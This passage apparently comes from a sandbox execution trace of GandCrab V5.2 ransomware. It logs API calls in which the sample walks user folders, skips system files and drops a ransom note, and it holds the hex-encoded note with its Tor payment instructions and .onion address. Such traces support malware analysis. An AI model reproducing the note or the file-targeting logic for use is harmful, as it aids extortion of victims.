47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.238] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0096.239] CloseHandle (hObject=0x2b4) returned 1 [0096.239] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.240] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.240] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x227)) [0096.240] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.240] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.240] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.240] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\d2ca4a09d2ca4deb61a.lock") returned 80 [0096.241] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\appdata\\local\\temporary internet files\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0096.241] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.241] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.242] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\") returned 56 [0096.242] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*") returned="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*" [0096.242] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0xffffffff [0096.242] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0xffffffff [0096.242] CloseHandle (hObject=0x2b4) returned 1 [0096.242] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0096.242] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.242] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.242] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Local\\TITWMVJL-DECRYPT.txt" [0096.242] lstrlenW (lpString=".titwmvjl") returned 9 [0096.242] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\TITWMVJL-DECRYPT.txt") returned 51 [0096.242] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.243] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Local\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 60 [0096.243] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\TITWMVJL-DECRYPT.txt") returned 51 [0096.243] lstrlenW (lpString=".txt") returned 4 [0096.243] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.243] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.243] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.243] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.243] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\TITWMVJL-DECRYPT.txt") returned 51 [0096.243] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\TITWMVJL-DECRYPT.txt") returned 51 [0096.243] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.243] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.243] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.244] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.244] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.244] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.244] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.244] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.244] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.244] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0096.244] FindClose (in: hFindFile=0x5037b8 | out: hFindFile=0x5037b8) returned 1 [0096.246] CloseHandle (hObject=0x2ac) returned 1 [0096.246] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.246] lstrcmpW (lpString1="Roaming", lpString2=".") returned 1 [0096.246] lstrcmpW (lpString1="Roaming", lpString2="..") returned 1 [0096.246] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="Roaming" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming") returned="C:\\Users\\Default\\AppData\\Roaming" [0096.246] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\") returned="C:\\Users\\Default\\AppData\\Roaming\\" [0096.246] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.247] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.247] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.247] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.248] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.248] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.248] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.248] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\\\TITWMVJL-DECRYPT.txt") returned 54 [0096.248] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0096.249] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73